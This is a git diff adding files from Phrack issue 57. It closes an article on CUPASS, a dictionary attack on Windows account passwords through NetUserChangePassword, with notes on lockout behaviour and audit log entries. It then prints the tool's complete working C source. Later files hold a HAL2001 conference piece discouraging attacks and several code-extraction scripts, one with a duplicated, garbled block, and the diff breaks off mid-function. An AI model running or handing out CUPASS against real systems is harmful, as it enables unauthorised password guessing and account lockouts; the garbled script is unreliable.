+  "Reset Account lockout after ..." are only relevant if the
+  "Account lockout treshold" ist set to any value >0.
+
+
+  If the treshold is set, than this takes affect to the work of CUPASS,
+  because all attempts of CUPASS exceeding the treshold will lead to an
+  account lockout :(
+
+
+  However the Logout Policy ist not valid for the Administrator on NT4
+  environments, until the NT Reskit tool "Passprop" is used!
+  In this case even the Administator account will be locked
+  for network logons!
+
+
+  If we start CUPASS against any account of a W2K server or a W2K domain
+  controller with AD, this account is locked out, and even the
+  Administrator account is marked as "Account is locked out", too !
+
+
+  But it is still possible for the Administrator account to log on
+  interactive on the machine!
+
+
+  
+  
+
+
+
+AUDIT POLICY
+------------
+
+
+  Lets have a look which auditing events have to enabled, to see an
+  CUPASS attack in the security logs of the target machine.
+
+
+  
+  Audit Account Management
+  ------------------------
+
+
+  If the setting "Audit Account Management" is enabled (success/failure),
+  an entry with the ID 627 appears in in the security log.
+
+
+  This entry contains all necessary datas for the administrator :(
+  These e.g. are: Date, Time, Target Account Name, Caller User Name etc.
+
+
+  
+  Audit account logon events
+  --------------------------
+
+
+  Surprisingly for some administrators, there appears no log entry if
+  the settings "Audit account logon events" or "Audit logon events"
+  are enabled, if the attack goes to the local machine.
+
+
+  This is e.g. the case if you want to guess the local administrator
+  password of your machine.
+
+
+  If the CUPASS attack comes from remote, log entries ID 681 and ID 529
+  occures.
+
+
+
+  Audit Object Access
+  -------------------
+  
+  If this type of auditing is enabled, and the attack goes to the
+  local machine, an logfile entry with the ID 560 and 562 appears.
+
+
+  ID 560 tells us that someone opened the object
+  "Security Account Manager" whilst 562 tells us something like
+  "Handle closed"...
+
+
+
+Maybe there occure some more logfile entries with other ID's, but these
+ones listed above are the ones I found while testing CUPASS.
+
+
+So test CUPASS on your own environment and have a look into your logfiles!
+
+
+
+
+----| LAST WORDS
+
+
+I hope this article could give you a little overview about the
+NetUserChangePassword problem, and Microsoft's inconsequent implementation
+of security and function calls.
+
+
+This article could not treat this topic concluding, because there are
+so many different situations and configurations that I could not test
+in my short sparetime :)
+
+
+
+----| GREETS
+
+
+Greets to Van Hauser who inspired me for this release, ganymed, mindmaniac
+and all the other members from THC, VAX who gives me a lift to HAL2001,
+the guys from TESO, Seth, Rookie and all the other people knowing me...
+
+
+The biggest THANX are going to my wife, who missed me nearly the whole
+weekend while I was writing this article!
+ 
+Ok, have a nice day and lets meet and party at HAL2001 :)
+
+
+
+<++> cupass.cpp !a10c7302
+/*
+ * CUPASS v1.0 (c) 2001 by Doc Holiday / THC <Holiday@TheHackersChoice.com>
+ * http://www.hackerschoice.com
+ *
+ * Dictionary Attack against Windows Passwords with NetUserChangePassword.
+ * Do only use for legal purposes.
+ * 
+ * Compiled and tested on Windows NT/W2K - runs not on Win9x!!
+ * Compiled with VC++ 6.0
+ *
+ */
+
+
+#define UNICODE 1
+#define _UNICODE 1
+
+
+#include <windows.h>
+#include <lmaccess.h>
+#include <stdio.h>
+#include <wchar.h>
+
+
+#pragma comment( lib, "netapi32.lib" )
+
+
+
+void wmain( int argc, wchar_t *argv[] )
+{
+        wchar_t *hostname = 0; 
+        wchar_t *username = 0; 
+        wchar_t *dictfile = 0; 
+        wchar_t myChar[256];
+        NET_API_STATUS result;
+        FILE *stream;
+        LPWSTR oldpassword; 
+
+
+        if (argc != 4)
+        { 
+        wprintf (L"\nMissing or wrong parameters!\n"); 
+            wprintf (
+               L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
+            exit(1);
+        }
+
+
+        hostname = argv[1];
+        username = argv[2];
+        dictfile = argv[3];
+
+
+    if (wcsncmp(hostname, L"\\\\",2 )!=0)
+        {
+            wprintf (L"\nups... you forgot the double backslash?");
+            wprintf (
+                L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
+            exit(1);
+        }
+
+
+  if( (stream  = _wfopen( dictfile, L"r" )) == NULL )
+        {
+      wprintf( L"\nups... dictionary %s could not be opened", dictfile );
+      wprintf (L"\nUsage: cupass \\\\hostname username dictionaryfile\n");
+        }
+   else
+   {
+        
+        wprintf (L"\n*** CUPASS 1.0 - Change User PASSword - by Doc Holiday/THC (c) 2001 ***\n");
+        wprintf (L"\nStarting attack .....\n");
+        wprintf (L"\nTarget: %s ", hostname);
+        wprintf (L"\nUser: %s\n ", username);
+
+
+        while( !feof( stream ) )
+        {
+          fgetws (myChar, 256,stream);
+
+
+          if (myChar[wcslen(myChar)-1] == '\r') myChar[wcslen(myChar)-1] = '\0';
+          if (myChar[wcslen(myChar)-1] == '\n') myChar[wcslen(myChar)-1] = '\0';
+
+
+          oldpassword = myChar;
+   
+          wprintf( L"\nTrying password %s \n", oldpassword );
+                
+          result = NetUserChangePassword( hostname, username,oldpassword, oldpassword );
+                
+          switch (result)
+          {
+                case 0: 
+                        wprintf( L"GOTCHA!! Password was changed\n" );
+                        wprintf( L"\nPassword from user '%s' is '%s'\n", username, oldpassword);
+                        fclose (stream);
+                        exit (1);
+                        break;
+                        
+                case 5: //ERROR_ACCESS_DENIED
+                        wprintf (L"Attempt failed -> ERROR_ACCESS_DENIED - \
+But password could be %s\n", oldpassword);
+                        fclose (stream);
+                        exit(1);
+                        break;
+                        
+                case 86: //ERROR_INVALID_PASSWORD
+                        wprintf( L"Attempt failed -> Incorrect password\n" );
+                        break;
+                        
+                case 1351: //ERROR_CANT_ACCESS_DOMAIN_INFO 
+                        wprintf (L"Attempt failed -> Can't establish connection to Host %s\n",hostname);
+                        fclose (stream);
+                        exit(1);
+                        break;
+
+
+                case 1909: //ERROR_ACCOUNT_LOCKED_OUT
+                        wprintf (L"Attempt failed -> Account locked out\n");
+                        fclose (stream);
+                        exit(1);
+                        break;
+
+
+                case 2221: //NERR_UserNotFound) 
+                        wprintf (L"Attempt failed -> User %s not found\n", username);
+                        fclose (stream);
+                        exit(1);                   
+                        break;
+                        
+                case 2226://NERR_NotPrimary
+                        wprintf (L"Attempt failed -> Operation only allowed on PDC\n");
+                        break;
+
+
+                case 2245:
+                        wprintf (L"GOTCHA!! Password is '%s' , but \
+couldn't be changed to '%s' due to password policy settings!\n", \
+oldpassword, oldpassword);
+                        fclose(stream);
+                        exit(1);
+                        break;
+
+
+                default:
+                        wprintf( L"\nAttempt failed :( %lu\n", result );
+                        fclose(stream);
+                        exit(1);
+                        break;
+                }
+        }
+        fclose (stream); 
+   }    
+}
+<--> end cupass.cpp
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/17.txt b/phrack57/17.txt
new file mode 100644
index 0000000..1c45b5f
--- /dev/null
+++ b/phrack57/17.txt
@@ -0,0 +1,122 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x11 of 0x12
+
+Each phrack release has a special section called 'Phrack World News (PWN)'.
+The section is a combination of sum-up's, happenings and rumours.
+
+PWN are the news about and from the scene.
+You can send PWN directly to disorder@phrack.org or you can announce
+your own PWN at http://www.phrack.org/disorder.
+
+
+|=------------------=[ ScRiPt KiDdY MaNuAl To HaL2001 ]=-----------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------------------=[ HAL Staff ]=-----------------------------=|
+
+Cops, Crimes, and HAL 2001 (http://www.hal2001.org)
+
+or ScRiPt KiDdY MaNuAl To HaL2001
+
+When you arrive at HAL2001 and look around you, you may feel this is an
+ideal place to do script-kiddie things. I mean: with 1 GB of bandwidth
+coming almost all the way to your tent, a simple ping-flood is a mighty
+weapon. And with all these people around, there's bound to be someone within
+10 meters that knows how to get root on that webhosting farm you found this
+morning.
+
+You may have also noticed all these other people around you. Most of them
+seem to be in some kind of different world. Most noticably, they're not
+constantly bragging about how many machines they have installed Stacheldraht
+on. When they talk about computer security you often don't understand, and
+they keep talking about vague political things a lot of the time. That's us.
+We are the rest of the hacker community. Weve been here for a while now, so
+you would probably just refer to most of us as "these old people".
+That's OK.
+
+We feel there are important things going on in the world today. Things worth
+fighting against. Governments and large corporations are basically taking
+over and are in the process of building mechanisms of control. That may
+sound difficult or weird, but think of new laws that allow instantaneous
+monitoring of anyone. Think of computer databases that know where everyone
+is in realtime. Think of cameras everywhere. Think of making you pay every
+time, for everything you watch or listen to. Think of your MP3 collection.
+Think of prison.
+
+- Making us all look bad
+
+Hey, let's not kid eachother: we weren't all that good when we were kids.
+But right now, powerful people all over the world would like to paint a
+picture of HAL2001 as a gathering of dangerous individuals out to destroy.
+While it may seem cool to have powerful people think of you as dangerous,
+you're only serving their purpose if you deface websites from here, or
+perform the mother of all DDoS attacks. You're helping the hardliners that
+say we are no good. They don't care about the websites you deface. They
+don't care about the DDoS attacks. Heck, their leadership doesn't even know
+how to hold a mouse. They care about making us all look like a threat, so
+they can get the public support needed to lock us all up.
+
+- Landing you in trouble
+
+But if you don't care about any of the above, here's another reason not to
+do bad things at HAL: there is almost no place on earth where the odds of
+getting arrested are stacked against you as bad as at HAL2001. Members of
+the dutch law enforcement community (yes: cops) are attending in large
+numbers. And public perception is that they haven't arrested enough people
+for computer crimes recently. So they are under a lot of pressure to arrest
+someone. Anyone....
+
+Because few people have been convicted here, there is a notion that the cops
+in The Netherlands do not take this seriously. But defacing a site or doing
+Denial of Service are serious crimes here, and you may not be going home for
+quite a while if you're arrested here. Being arrested at HAL makes your case
+a "big deal", no matter how little may have actually happened. This means
+they are less likely to let you off with a slap on the wrist.
+
+And if HAL is anything like its predecessors, intelligence people
+frominternal security agencies of most industrialised nations are
+walkingaround, and will see if anyone from their country is sticking their
+head out doing naughty things. HAL is an excellent place to become visible,
+in many different and often interesting ways.
+
+- Getting us all disconnected
+
+Just like at HIP97, the authorities have pre-signed orders ready and waiting
+to cut our link to the world if the HAL network becomes a source of too many
+problems. Yes, you read it right: cut the link. 100% packet loss.
+
+HAL2001 has some of the worlds best system administrators monitoring our
+link to see if everything runs smooth. Some of these people already had a
+deep understanding of computer security issues before you were even born.
+And *ofcourse* they are monitoring to see if anyone is causing problems,
+either to our own network operations, or to the outside world.
+
+So do us all and yourself a favour, and please don't be stupid. And if you
+still insist on causing trouble, think of this: if you do manage to get us
+all diconnected, maybe you should hope the cops get to you first.
+
+- Growing up
+
+If you have it in you, now would be an excellent time to grow up. Live a
+life in the hacker community that goes beyond defacing websites and
+performing dDoS attacks. The post script-kiddie existence offers many
+rewards: you might have feeling you've done something useful more often,
+people won't look at you funny, and you might even get to meet girls.
+
+Perhaps even more importantly: we as a community _need_ you to grow up. As
+we said: Governments and large corporations are taking control of our world
+at alarming speed. Hackers are more likely to understand what's going on,
+and to do something about it. Which is one reason why they are being
+demonized by parties seeking to monitor the whole population's every move.
+Many privacy enhancing technologies still need to be built, and a whole new
+generation needs to be made aware that their freedoms are being dismantled.
+Your help would be greatly appreciated.
+
+|=[ Fun ]=---------------------------------------------------------------=|
+
+http://www.microsoft.com/office/clippy/images/rollover_4.gif
+
+N0 L0GZ == N0 CRIME !
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/18.txt b/phrack57/18.txt
new file mode 100644
index 0000000..efa021b
--- /dev/null
+++ b/phrack57/18.txt
@@ -0,0 +1,754 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x12 of 0x12
+
+|=--------=[ P H R A C K   E X T R A C T I O N   U T I L I T Y ]=--------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ phrackstaff ]=----------------------------=|
+
+The Phrack Magazine Extraction Utility, first appearing in P50, is a convenient
+way to extract code from textual ASCII articles.  It preserves readability and
+7-bit clean ASCII codes.  As long as there are no extraneous "<++>" or <-->" in
+the article, everything runs swimmingly.
+
+Source and precompiled version (windows, unix, ...) is available at
+http://www.phrack.org/misc.
+
+|-----------------------------------------------------------------------------|
+
+<++> p56/EX/PMEU/extract4.c !8e2bebc6
+
+/*
+ *  extract.c by Phrack Staff and sirsyko
+ *
+ *  Copyright (c) 1997 - 2000 Phrack Magazine
+ *
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ *  extract.c
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory structure.  Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  Extraction tags are of the form:
+ *
+ *  host:~> cat testfile
+ *  irrelevant file contents
+ *  <++> path_and_filename1 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filename2 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filenamen !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  EOF
+ *
+ *  The `!CRC` is optional.  The filename is not.  To generate crc32 values 
+ *  for your files, simply give them a dummy value initially.  The program
+ *  will attempt to verify the crc and fail, dumping the expected crc value.
+ *  Use that one.  i.e.:
+ *
+ *  host:~> cat testfile
+ *  this text is ignored by the program
+ *  <++> testarooni !12345678
+ *  text to extract into a file named testarooni
+ *  as is this text
+ *  <--> 
+ *
+ *  host:~> ./extract testfile
+ *  Opened testfile
+ *   - Extracting testarooni
+ *   crc32 failed (12345678 != 4a298f18)
+ *  Extracted 1 file(s).  
+ *
+ *  You would use `4a298f18` as your crc value.
+ *
+ *  Compilation:
+ *  gcc -o extract extract.c
+ *  
+ *  ./extract file1 file2 ... filen
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <string.h>
+#include <dirent.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+
+#define VERSION         "7niner.20000430 revsion q"
+
+#define BEGIN_TAG       "<++> "
+#define END_TAG         "<-->"
+#define BT_SIZE         strlen(BEGIN_TAG)
+#define ET_SIZE         strlen(END_TAG)
+#define EX_DO_CHECKS    0x01
+#define EX_QUIET        0x02
+
+struct f_name
+{
+    u_char name[256];
+    struct f_name *next;
+};
+
+unsigned long crcTable[256];
+
+
+void crcgen() 
+{
+    unsigned long crc, poly;
+    int i, j;
+    poly = 0xEDB88320L;
+    for (i = 0; i < 256; i++)
+    {
+        crc = i;
+        for (j = 8; j > 0; j--)
+        {
+            if (crc & 1)
+            {
+                crc = (crc >> 1) ^ poly;
+            } 
+            else
+            {
+                crc >>= 1;
+            }
+        }
+        crcTable[i] = crc;
+    }
+}
+
+        
+unsigned long check_crc(FILE *fp)
+{
+    register unsigned long crc;
+    int c;
+
+    crc = 0xFFFFFFFF;
+    while( (c = getc(fp)) != EOF )
+    {
+         crc = ((crc >> 8) & 0x00FFFFFF) ^ crcTable[(crc ^ c) & 0xFF];
+    }
+ 
+    if (fseek(fp, 0, SEEK_SET) == -1)
+    {
+        perror("fseek");
+        exit(EXIT_FAILURE);
+    }
+
+    return (crc ^ 0xFFFFFFFF);
+}
+
+
+int
+main(int argc, char **argv)
+{ 
+    char *name;
+    u_char b[256], *bp, *fn, flags;
+    int i, j = 0, h_c = 0, c;
+    unsigned long crc = 0, crc_f = 0;
+    FILE *in_p, *out_p = NULL;
+    struct f_name *fn_p = NULL, *head = NULL, *tmp = NULL;
+
+    while ((c = getopt(argc, argv, "cqv")) != EOF)
+    {
+        switch (c)
+        {
+            case 'c':
+                flags |= EX_DO_CHECKS;
+                break;
+            case 'q':
+                flags |= EX_QUIET;
+                break;
+            case 'v':
+                fprintf(stderr, "Extract version: %s\n", VERSION);
+                exit(EXIT_SUCCESS);
+        }
+    }
+    c = argc - optind;
+
+    if (c < 2)
+    {
+        fprintf(stderr, "Usage: %s [-cqv] file1 file2 ... filen\n", argv[0]);
+        exit(0); 
+    }
+
+    /*
+     *  Fill the f_name list with all the files on the commandline (ignoring
+     *  argv[0] which is this executable).  This includes globs.
+     */
+    for (i = 1; (fn = argv[i++]); )
+    {
+        if (!head)
+        {
+            if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            strncpy(head->name, fn, sizeof(head->name));
+            head->next = NULL;
+            fn_p = head;
+        }
+        else
+        {
+            if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            fn_p = fn_p->next;
+            strncpy(fn_p->name, fn, sizeof(fn_p->name));
+            fn_p->next = NULL;
+        }
+    }
+    /*
+     *  Sentry node.
+     */
+    if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+    {
+        perror("malloc");
+        exit(EXIT_FAILURE);
+     }
+    fn_p = fn_p->next;
+    fn_p->next = NULL;
+
+    /*
+     *  Check each file in the f_name list for extraction tags.
+     */
+    for (fn_p = head; fn_p->next; )
+    {
+        if (!strcmp(fn_p->name, "-"))
+        {
+            in_p = stdin;
+            name = "stdin";
+        }
+        else if (!(in_p = fopen(fn_p->name, "r")))
+        {
+            fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
+            fn_p = fn_p->next;
+	    continue;
+        }
+        else
+        {
+            name = fn_p->name;
+        }
+
+        if (!(flags & EX_QUIET))
+        {
+            fprintf(stderr, "Scanning %s...\n", fn_p->name);
+        }
+        crcgen();
+        while (fgets(b, 256, in_p))
+        { 
+            if (!strncmp(b, BEGIN_TAG, BT_SIZE))
+            {
+	        b[strlen(b) - 1] = 0;           /* Now we have a string. */
+                j++;
+
+                crc = 0;
+                crc_f = 0;
+                if ((bp = strchr(b + BT_SIZE + 1, '/')))
+                {
+                    while (bp)
+                    {
+		        *bp = 0;
+                        if (mkdir(b + BT_SIZE, 0700) == -1 && errno != EEXIST)
+                        {
+                            perror("mkdir");
+                            exit(EXIT_FAILURE);
+                        }
+                        *bp = '/';
+		        bp = strchr(bp + 1, '/'); 
+		    }
+                }
+
+                if ((bp = strchr(b, '!')))
+                {
+                    crc_f = 
+                        strtoul((b + (strlen(b) - strlen(bp)) + 1), NULL, 16);
+                   b[strlen(b) - strlen(bp) - 1 ] = 0;
+                   h_c = 1;
+                }
+                else
+                {
+                    h_c = 0;
+                }
+                if ((out_p = fopen(b + BT_SIZE, "wb+")))
+                {
+                    fprintf(stderr, ". Extracting %s\n", b + BT_SIZE);
+                }
+                else
+                {
+        	    printf(". Could not extract anything from '%s'.\n",
+                        b + BT_SIZE);
+        	    continue;
+                }
+            }
+            else if (!strncmp (b, END_TAG, ET_SIZE))
+            {
+                if (out_p)
+                {
+                    if (h_c == 1)
+                    {
+                        if (fseek(out_p, 0l, 0) == -1)
+                        {
+                            perror("fseek");
+                            exit(EXIT_FAILURE);
+                        }
+                        crc = check_crc(out_p);
+                        if (crc == crc_f && !(flags & EX_QUIET))
+                        {
+                            fprintf(stderr, ". CRC32 verified (%08lx)\n", crc);
+                        }
+                        else
+                        {
+                            if (!(flags & EX_QUIET))
+                            {
+                                fprintf(stderr, ". CRC32 failed (%08lx != %08lx)\n",
+                                        crc_f, crc);
+                            }
+                        }
+                    }
+                    fclose(out_p);
+                }
+	        else
+                {
+	            fprintf(stderr, ". `%s` had bad tags.\n", fn_p->name);
+		    continue;
+	        }
+            }
+            else if (out_p)
+            {
+                fputs(b, out_p);
+            }
+        }
+        if (in_p != stdin)
+        {
+            fclose(in_p);
+        }
+        tmp = fn_p;
+        fn_p = fn_p->next;
+        free(tmp);
+    }
+    if (!j)
+    {
+        printf("No extraction tags found in list.\n");
+    }
+    else
+    {
+        printf("Extracted %d file(s).\n", j);
+    }
+    return (0);
+}
+/* EOF */
+<-->
+<++> p56/EX/PMEU/extract.pl !1a19d427
+# Daos <daos@nym.alias.net>
+#!/bin/sh -- # -*- perl -*- -n
+eval 'exec perl $0 -S ${1+"$@"}' if 0;
+
+$opening=0;
+
+if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;};
+if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; 
+if ($opening) {                        
+        chop $curfile;                 
+        $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//);
+        eval {mkdir $sex_dir, "0777";}; 
+        open(ct_ex,">$curfile"); 
+        print "Attempting extraction of $curfile\n";
+        $opened=1; 
+}
+if ($opened && !$opening) {print ct_ex $_}; 
+<-->
+
+<++> p56/EX/PMEU/extract.awk !26522c51
+#!/usr/bin/awk -f
+#
+# Yet Another Extraction Script
+# - <sirsyko>
+#
+/^\<\+\+\>/ {
+        ind = 1
+        File = $2
+        split ($2, dirs, "/")
+        Dir="."
+        while ( dirs[ind+1] ) {
+                Dir=Dir"/"dirs[ind]
+                system ("mkdir " Dir" 2>/dev/null")
+                ++ind
+        }
+        next
+}
+/^\<\-\-\>/ {
+        File = ""
+        next
+}
+File { print >> File }
+<-->
+<++> p56/EX/PMEU/extract.sh !a81a2320
+#!/bin/sh
+# exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko>
+#
+# note, this file will create all directories relative to the current directory
+# originally a bug, I've now upgraded it to a feature since I dont want to deal
+# with the leading / (besides, you dont want hackers giving you full pathnames
+# anyway, now do you :)
+# Hopefully this will demonstrate another useful aspect of IFS other than 
+# haxoring rewt
+#
+# Usage: ./extract.sh <filename>
+
+cat $* | (
+Working=1
+while [ $Working ];
+do
+        OLDIFS1="$IFS"
+        IFS=
+        if read Line; then
+                IFS="$OLDIFS1"
+                set -- $Line
+                case "$1" in
+                "<++>") OLDIFS2="$IFS"
+                        IFS=/
+                        set -- $2
+                        IFS="$OLDIFS2"
+                        while [ $# -gt 1 ]; do
+                                File=${File:-"."}/$1
+                                if [ ! -d $File ]; then
+                                        echo "Making dir $File"
+                                        mkdir $File
+                                fi
+                                shift
+                        done                               
+                        File=${File:-"."}/$1
+                        echo "Storing data in $File"
+                ;;
+                "<-->") if [ "x$File" != "x" ]; then
+                                unset File
+                        fi ;;
+                *)      if [ "x$File" != "x" ]; then
+                                        IFS=
+                                        echo "$Line" >> $File
+                                        IFS="$OLDIFS1"
+                        fi
+                ;;
+                esac
+                IFS="$OLDIFS1"
+        else
+                echo "End of file"
+                unset Working
+        fi
+done
+)                                                                    
+<-->
+<++> p56/EX/PMEU/extract.py !83f65f60
+#! /bin/env python
+# extract.py    Timmy 2tone <_spoon_@usa.net>
+
+import sys, string, getopt, os
+
+class Datasink:
+    """Looks like a file, but doesn't do anything."""
+    def write(self, data): pass
+    def close(self): pass
+
+def extract(input, verbose = 1):
+    """Read a file from input until we find the end token."""
+
+    if type(input) == type('string'):
+        fname = input
+        try: input = open(fname)
+        except IOError, (errno, why):
+            print "Can't open %s: %s" % (fname, why)
+            return errno
+    else:
+        fname = '<file descriptor %d>' % input.fileno()
+
+    inside_embedded_file = 0
+    linecount = 0
+    line = input.readline()
+    while line:
+
+        if not inside_embedded_file and line[:4] == '<++>':
+
+            inside_embedded_file = 1
+            linecount = 0
+
+            filename = string.strip(line[4:])
+            if mkdirs_if_any(filename) != 0:
+                pass
+
+            try: output = open(filename, 'w')
+            except IOError, (errno, why):
+                print "Can't open %s: %s; skipping file" % (filename, why)
+                output = Datasink()
+                continue
+
+            if verbose:
+                print 'Extracting embedded file %s from %s...' % (filename,
+                                                                  fname),
+
+        elif inside_embedded_file and line[:4] == '<-->':
+            output.close()
+            inside_embedded_file = 0
+            if verbose and not isinstance(output, Datasink):
+                print '[%d lines]' % linecount
+
+        elif inside_embedded_file:
+            output.write(line)
+
+        # Else keep looking for a start token.
+        line = input.readline()
+        linecount = linecount + 1
+
+def mkdirs_if_any(filename, verbose = 1):
+    """Check for existance of /'s in filename, and make directories."""
+
+    path, file = os.path.split(filename)
+    if not path: return
+
+    errno = 0
+    start = os.getcwd()
+    components = string.split(path, os.sep)
+    for dir in components:
+        if not os.path.exists(dir):
+            try:
+                os.mkdir(dir)
+                if verbose: print 'Created directory', path
+
+            except os.error, (errno, why):
+                print "Can't make directory %s: %s" % (dir, why)
+                break
+
+        try: os.chdir(dir)
+        except os.error, (errno, why):
+            print "Can't cd to directory %s: %s" % (dir, why)
+            break
+
+    os.chdir(start)
+    return errno
+
+def usage():
+    """Blah."""
+    die('Usage: extract.py [-V] filename [filename...]')
+
+def main():
+    try: optlist, args = getopt.getopt(sys.argv[1:], 'V')
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = ['-v', filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass
+
+
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = [filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass              # No messy traceback.
+<-->
+<++> p56/EX/PMEU/extract-win.c !e519375d
+/***************************************************************************/
+/* WinExtract                                                              */
+/*                                                                         */
+/* Written by Fotonik <fotonik@game-master.com>.                           */
+/*                                                                         */
+/* Coding of WinExtract started on 22aug98.                                */
+/*                                                                         */
+/* This version (1.0) was last modified on 22aug98.                        */
+/*                                                                         */
+/* This is a Win32 program to extract text files from a specially tagged   */
+/* flat file into a hierarchical directory structure.  Use to extract      */
+/* source code from articles in Phrack Magazine.  The latest version of    */
+/* this program (both source and executable codes) can be found on my      */
+/* website:  http://www.altern.com/fotonik                                 */
+/***************************************************************************/
+
+
+#include <stdio.h>
+#include <string.h>
+#include <windows.h>
+
+
+void PowerCreateDirectory(char *DirectoryName);
+
+
+int WINAPI WinMain(HINSTANCE hThisInst, HINSTANCE hPrevInst,
+                   LPSTR lpszArgs, int nWinMode)
+{
+OPENFILENAME OpenFile; /* Structure for Open common dialog box */
+char InFileName[256]="";
+char OutFileName[256];
+char Title[]="WinExtract - Choose a file to extract files from.";
+FILE *InFile;
+FILE *OutFile;
+char Line[256];
+char DirName[256];
+int FileExtracted=0;   /* Flag used to determine if at least one file was */
+int i;                 /* extracted */
+
+ZeroMemory(&OpenFile, sizeof(OPENFILENAME));
+OpenFile.lStructSize=sizeof(OPENFILENAME);
+OpenFile.hwndOwner=HWND_DESKTOP;
+OpenFile.hInstance=hThisInst;
+OpenFile.lpstrFile=InFileName;
+OpenFile.nMaxFile=sizeof(InFileName)-1;
+OpenFile.lpstrTitle=Title;
+OpenFile.Flags=OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;
+
+if(GetOpenFileName(&OpenFile))
+   {
+   if((InFile=fopen(InFileName,"r"))==NULL)
+      {
+      MessageBox(NULL,"Could not open file.",NULL,MB_OK);
+      return 0;
+      }
+
+   /* If we got here, InFile is opened. */
+   while(fgets(Line,256,InFile))
+      {
+      if(!strncmp(Line,"<++> ",5)) /* If line begins with "<++> " */
+         {
+         Line[strlen(Line)-1]='\0';
+         strcpy(OutFileName,Line+5);
+
+         /* Check if a dir has to be created and create one if necessary */
+         for(i=strlen(OutFileName)-1;i>=0;i--)
+            {
+            if((OutFileName[i]=='\\')||(OutFileName[i]=='/'))
+               {
+               strncpy(DirName,OutFileName,i);
+               DirName[i]='\0';
+               PowerCreateDirectory(DirName);
+               break;
+               }
+            }
+
+         if((OutFile=fopen(OutFileName,"w"))==NULL)
+            {
+            MessageBox(NULL,"Could not create file.",NULL,MB_OK);
+            fclose(InFile);
+            return 0;
+            }
+
+         /* If we got here, OutFile can be written to */
+         while(fgets(Line,256,InFile))
+            {
+            if(strncmp(Line,"<-->",4)) /* If line doesn't begin w/ "<-->" */
+               {
+               fputs(Line, OutFile);
+               }
+            else
+               {
+               break;
+               }
+            }
+         fclose(OutFile);
+         FileExtracted=1;
+         }
+      }
+   fclose(InFile);
+   if(FileExtracted)
+      {
+      MessageBox(NULL,"Extraction sucessful.","WinExtract",MB_OK);
+      }
+   else
+      {
+      MessageBox(NULL,"Nothing to extract.","Warning",MB_OK);
+      }
+   }
+   return 1;
+}
+
+
+/* PowerCreateDirectory is a function that creates directories that are */
+/* down more than one yet unexisting directory levels.  (e.g. c:\1\2\3) */
+void PowerCreateDirectory(char *DirectoryName)
+{
+int i;
